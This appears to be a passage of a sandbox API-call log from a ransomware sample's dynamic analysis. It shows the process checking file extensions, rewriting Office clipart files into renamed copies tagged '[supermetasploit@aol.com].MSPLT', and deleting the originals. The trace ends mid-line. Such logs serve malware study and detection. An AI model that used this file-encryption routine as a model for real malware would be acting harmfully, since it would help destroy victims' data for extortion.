SetEndOfFile (hFile=0x544) returned 1 [0314.629] CloseHandle (hObject=0x544) returned 1 [0314.629] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0314.629] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01638_.wmf")) returned 1 [0314.630] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 68 [0314.630] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 68 [0314.630] lstrlenW (lpString=".doc") returned 4 [0314.630] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0314.631] lstrlenW (lpString=".docx") returned 5 [0314.631] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0314.631] lstrlenW (lpString=".pdf") returned 4 [0314.631] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0314.631] lstrlenW (lpString=".xls") returned 4 [0314.631] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0314.631] lstrlenW (lpString=".xlsx") returned 5 [0314.631] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0314.631] lstrlenW (lpString=".ppt") returned 4 [0314.631] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0314.631] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 68 [0314.631] lstrlenW (lpString=".zip") returned 4 [0314.631] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0314.631] lstrlenW (lpString=".rar") returned 4 [0314.631] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0314.631] lstrlenW (lpString=".bz2") returned 4 [0314.631] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0314.631] lstrlenW (lpString=".7z") returned 3 [0314.631] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0314.631] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 68 [0314.631] lstrlenW (lpString=".dbf") returned 4 [0314.632] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0314.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 68 [0314.632] lstrlenW (lpString=".1cd") returned 4 [0314.632] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0314.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 68 [0314.632] lstrlenW (lpString=".jpg") returned 4 [0314.632] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0314.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 68 [0314.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 68 [0314.632] lstrlenW (lpString=".doc") returned 4 [0314.632] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0314.632] lstrlenW (lpString=".docx") returned 5 [0314.632] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0314.632] lstrlenW (lpString=".pdf") returned 4 [0314.632] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0314.632] lstrlenW (lpString=".xls") returned 4 [0314.632] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0314.632] lstrlenW (lpString=".xlsx") returned 5 [0314.632] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0314.632] lstrlenW (lpString=".ppt") returned 4 [0314.633] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0314.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 68 [0314.633] lstrlenW (lpString=".zip") returned 4 [0314.633] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0314.633] lstrlenW (lpString=".rar") returned 4 [0314.633] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0314.633] lstrlenW (lpString=".bz2") returned 4 [0314.633] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0314.633] lstrlenW (lpString=".7z") returned 3 [0314.633] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0314.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 68 [0314.633] lstrlenW (lpString=".dbf") returned 4 [0314.633] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0314.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 68 [0314.633] lstrlenW (lpString=".1cd") returned 4 [0314.633] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0314.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 68 [0314.633] lstrlenW (lpString=".jpg") returned 4 [0314.633] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0314.634] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0314.634] lstrlenW (lpString="CG1606.WMF") returned 10 [0314.634] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cg1606.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x544 [0314.636] GetFileSizeEx (in: hFile=0x544, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=3564) returned 1 [0314.636] CloseHandle (hObject=0x544) returned 1 [0314.636] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cg1606.wmf")) returned 0x220 [0314.636] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cg1606.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0314.637] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cg1606.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x544 [0314.637] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.637] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.637] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cg1606.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x51c [0314.638] GetLastError () returned 0x0 [0314.638] ReadFile (in: hFile=0x544, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0xdec, lpOverlapped=0x0) returned 1 [0314.643] WriteFile (in: hFile=0x51c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xdf0, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xdf0, lpOverlapped=0x0) returned 1 [0314.645] ReadFile (in: hFile=0x544, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0314.645] WriteFile (in: hFile=0x51c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xe8, lpOverlapped=0x0) returned 1 [0314.645] SetEndOfFile (hFile=0x51c) returned 1 [0314.646] CloseHandle (hObject=0x51c) returned 1 [0314.646] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.646] SetEndOfFile (hFile=0x544) returned 1 [0315.086] CloseHandle (hObject=0x544) returned 1 [0315.086] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0315.380] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cg1606.wmf")) returned 1 [0315.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF") returned 66 [0315.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF") returned 66 [0315.386] lstrlenW (lpString=".doc") returned 4 [0315.386] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0315.386] lstrlenW (lpString=".docx") returned 5 [0315.386] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0315.386] lstrlenW (lpString=".pdf") returned 4 [0315.386] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0315.387] lstrlenW (lpString=".xls") returned 4 [0315.387] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0315.387] lstrlenW (lpString=".xlsx") returned 5 [0315.387] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0315.387] lstrlenW (lpString=".ppt") returned 4 [0315.387] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0315.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF") returned 66 [0315.387] lstrlenW (lpString=".zip") returned 4 [0315.387] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0315.387] lstrlenW (lpString=".rar") returned 4 [0315.387] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0315.387] lstrlenW (lpString=".bz2") returned 4 [0315.387] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0315.387] lstrlenW (lpString=".7z") returned 3 [0315.387] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0315.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF") returned 66 [0315.387] lstrlenW (lpString=".dbf") returned 4 [0315.387] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0315.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF") returned 66 [0315.387] lstrlenW (lpString=".1cd") returned 4 [0315.387] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0315.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF") returned 66 [0315.387] lstrlenW (lpString=".jpg") returned 4 [0315.388] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0315.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF") returned 66 [0315.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF") returned 66 [0315.388] lstrlenW (lpString=".doc") returned 4 [0315.388] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0315.388] lstrlenW (lpString=".docx") returned 5 [0315.388] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0315.388] lstrlenW (lpString=".pdf") returned 4 [0315.388] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0315.388] lstrlenW (lpString=".xls") returned 4 [0315.388] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0315.388] lstrlenW (lpString=".xlsx") returned 5 [0315.388] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0315.388] lstrlenW (lpString=".ppt") returned 4 [0315.388] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0315.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF") returned 66 [0315.388] lstrlenW (lpString=".zip") returned 4 [0315.388] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0315.388] lstrlenW (lpString=".rar") returned 4 [0315.388] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0315.388] lstrlenW (lpString=".bz2") returned 4 [0315.388] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0315.388] lstrlenW (lpString=".7z") returned 3 [0315.389] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0315.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF") returned 66 [0315.389] lstrlenW (lpString=".dbf") returned 4 [0315.389] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0315.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF") returned 66 [0315.389] lstrlenW (lpString=".1cd") returned 4 [0315.389] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0315.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF") returned 66 [0315.389] lstrlenW (lpString=".jpg") returned 4 [0315.389] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0315.389] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0315.389] lstrlenW (lpString="CRANE.WMF") returned 9 [0315.389] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\crane.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0315.390] GetFileSizeEx (in: hFile=0x530, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=5270) returned 1 [0315.390] CloseHandle (hObject=0x530) returned 1 [0315.390] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\crane.wmf")) returned 0x220 [0315.390] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\crane.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0315.390] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\crane.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x51c [0316.411] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0316.412] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0316.412] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\crane.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0317.015] GetLastError () returned 0x0 [0317.015] ReadFile (in: hFile=0x51c, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x1496, lpOverlapped=0x0) returned 1 [0317.017] WriteFile (in: hFile=0x530, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x14a0, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x14a0, lpOverlapped=0x0) returned 1 [0317.019] ReadFile (in: hFile=0x51c, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0317.019] WriteFile (in: hFile=0x530, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xe6, lpOverlapped=0x0) returned 1 [0317.019] SetEndOfFile (hFile=0x530) returned 1 [0317.019] CloseHandle (hObject=0x530) returned 1 [0317.019] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0317.019] SetEndOfFile (hFile=0x51c) returned 1 [0317.023] CloseHandle (hObject=0x51c) returned 1 [0317.023] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0317.025] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\crane.wmf")) returned 1 [0317.026] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF") returned 65 [0317.026] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF") returned 65 [0317.026] lstrlenW (lpString=".doc") returned 4 [0317.026] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0317.026] lstrlenW (lpString=".docx") returned 5 [0317.026] lstrcmpiW (lpString1=".docx", lpString2="E.WMF") returned -1 [0317.027] lstrlenW (lpString=".pdf") returned 4 [0317.027] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0317.027] lstrlenW (lpString=".xls") returned 4 [0317.027] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0317.027] lstrlenW (lpString=".xlsx") returned 5 [0317.027] lstrcmpiW (lpString1=".xlsx", lpString2="E.WMF") returned -1 [0317.027] lstrlenW (lpString=".ppt") returned 4 [0317.027] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0317.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF") returned 65 [0317.027] lstrlenW (lpString=".zip") returned 4 [0317.027] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0317.027] lstrlenW (lpString=".rar") returned 4 [0317.027] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0317.027] lstrlenW (lpString=".bz2") returned 4 [0317.027] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0317.027] lstrlenW (lpString=".7z") returned 3 [0317.027] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0317.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF") returned 65 [0317.027] lstrlenW (lpString=".dbf") returned 4 [0317.027] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0317.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF") returned 65 [0317.027] lstrlenW (lpString=".1cd") returned 4 [0317.027] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0317.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF") returned 65 [0317.027] lstrlenW (lpString=".jpg") returned 4 [0317.027] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0317.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF") returned 65 [0317.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF") returned 65 [0317.028] lstrlenW (lpString=".doc") returned 4 [0317.028] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0317.028] lstrlenW (lpString=".docx") returned 5 [0317.028] lstrcmpiW (lpString1=".docx", lpString2="E.WMF") returned -1 [0317.028] lstrlenW (lpString=".pdf") returned 4 [0317.028] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0317.028] lstrlenW (lpString=".xls") returned 4 [0317.028] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0317.028] lstrlenW (lpString=".xlsx") returned 5 [0317.028] lstrcmpiW (lpString1=".xlsx", lpString2="E.WMF") returned -1 [0317.028] lstrlenW (lpString=".ppt") returned 4 [0317.028] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0317.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF") returned 65 [0317.028] lstrlenW (lpString=".zip") returned 4 [0317.028] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0317.028] lstrlenW (lpString=".rar") returned 4 [0317.028] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0317.028] lstrlenW (lpString=".bz2") returned 4 [0317.028] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0317.028] lstrlenW (lpString=".7z") returned 3 [0317.028] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0317.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF") returned 65 [0317.028] lstrlenW (lpString=".dbf") returned 4 [0317.028] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0317.029] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF") returned 65 [0317.029] lstrlenW (lpString=".1cd") returned 4 [0317.029] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0317.029] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF") returned 65 [0317.029] lstrlenW (lpString=".jpg") returned 4 [0317.029] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0317.029] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0317.029] lstrlenW (lpString="DD00117_.WMF") returned 12 [0317.029] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00117_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x51c [0317.035] GetFileSizeEx (in: hFile=0x51c, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=31122) returned 1 [0317.035] CloseHandle (hObject=0x51c) returned 1 [0317.035] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00117_.wmf")) returned 0x220 [0317.035] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00117_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0317.036] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00117_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x51c [0317.036] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0317.036] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0317.036] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00117_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0317.037] GetLastError () returned 0x0 [0317.037] ReadFile (in: hFile=0x51c, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x7992, lpOverlapped=0x0) returned 1 [0317.040] WriteFile (in: hFile=0x530, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x79a0, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x79a0, lpOverlapped=0x0) returned 1 [0317.042] ReadFile (in: hFile=0x51c, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0317.042] WriteFile (in: hFile=0x530, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0317.042] SetEndOfFile (hFile=0x530) returned 1 [0317.042] CloseHandle (hObject=0x530) returned 1 [0317.042] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0317.043] SetEndOfFile (hFile=0x51c) returned 1 [0317.046] CloseHandle (hObject=0x51c) returned 1 [0317.046] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0317.047] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF" (normalized: "c:\\program files\\microsoft 